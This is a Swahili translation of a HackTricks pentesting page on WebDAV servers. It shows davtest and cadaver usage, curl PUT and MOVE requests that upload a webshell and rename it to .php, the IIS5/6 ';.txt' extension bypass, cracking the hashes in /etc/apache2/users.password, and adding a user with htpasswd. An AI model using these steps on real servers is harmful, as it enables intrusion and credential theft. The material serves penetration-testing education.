hacktricks/network-services-pentesting/pentesting-web/put-method-webdav.md

132 lines
7.1 KiB
Markdown

# WebDav
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa kutumia zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Unaposhughulika na **HTTP Server yenye WebDav** imewezeshwa, ni rahisi **kudhibiti faili** ikiwa una **sifa sahihi**, kawaida huthibitishwa kupitia **Uthibitishaji wa Msingi wa HTTP**. Kupata udhibiti juu ya seva kama hiyo mara nyingi hujumuisha **kupakia na kutekeleza webshell**.
Upatikanaji wa seva ya WebDav kawaida unahitaji **sifa halali**, na [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) ikiwa njia ya kawaida ya kuzipata.
Ili kushinda vizuizi kwenye kupakia faili, hasa zile zinazozuia utekelezaji wa skripti za upande wa seva, unaweza:
* **Pakia** faili zenye **nyongeza za kutekelezeka** moja kwa moja ikiwa hazijazuiliwa.
* **Badilisha jina** la faili zilizopakiwa zisizo za kutekelezeka (kama .txt) kuwa nyongeza inayoweza kutekelezeka.
* **Nakili** faili zilizopakiwa zisizo za kutekelezeka, zikibadilisha nyongeza yao kuwa moja inayoweza kutekelezeka.
## DavTest
**Davtest** jaribu **kupakia faili kadhaa zenye nyongeza tofauti** na **angalia** ikiwa nyongeza ina **tekelezwa**:
```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
```
Output sample:
![](<../../.gitbook/assets/image (851).png>)
Hii haimaanishi kwamba **.txt** na **.html extensions zinatekelezwa**. Hii inamaanisha kwamba unaweza **kufikia faili hizi** kupitia wavuti.
## Cadaver
Unaweza kutumia chombo hiki ku **kuunganisha kwenye seva ya WebDav** na kutekeleza vitendo (kama **kupakia**, **kuhamisha** au **kufuta**) **kwa mkono**.
```
cadaver <IP>
```
## Ombi la PUT
```
curl -T 'shell.txt' 'http://$ip'
```
## Ombi la KUHAMISHA
```
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia** **mchakato** kwa kutumia zana za **jamii** za **juu kabisa** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## IIS5/6 WebDav Udhaifu
Udhaifu huu ni wa kuvutia sana. **WebDav** **haikubali** **kupakia** au **kubadilisha jina** la faili lenye kipengee **.asp**. Lakini unaweza **kupuuza** hili kwa **kuongeza** mwishoni mwa jina **";.txt"** na faili ita **tekelezwa** kana kwamba ni faili ya .asp (unaweza pia **kutumia ".html" badala ya ".txt"** lakini **USISAHAU ";"**).
Kisha unaweza **kupakia** kabati yako kama faili ya ".**txt"** na **nakili/hamisha** kwa faili ya ".asp;.txt". Ukifika kwenye faili hiyo kupitia seva ya wavuti, ita **tekelezwa** (cadaver itasema kuwa hatua ya kuhamisha haikufanya kazi, lakini ilifanya kazi).
![](<../../.gitbook/assets/image (1092).png>)
## Tuma siri
Ikiwa Webdav ilikuwa inatumia seva ya Apache unapaswa kutazama tovuti zilizowekwa katika Apache. Kawaida:\
_**/etc/apache2/sites-enabled/000-default**_
Ndani yake unaweza kupata kitu kama:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
```
Kama unavyoweza kuona kuna faili zenye **vyeti** halali kwa seva ya **webdav**:
```
/etc/apache2/users.password
```
Ndani ya aina hii ya faili utapata **jina la mtumiaji** na **hash** ya nenosiri. Hizi ni anwani za seva ya webdav inayotumia kuthibitisha watumiaji.
Unaweza kujaribu **kuzivunja**, au **kuongeza zaidi** ikiwa kwa sababu fulani unataka **kupata** seva ya **webdav**:
```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```
Kuchunguza ikiwa sifa mpya za kibali zinafanya kazi unaweza kufanya:
```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```
## Marejeo
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii za **juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}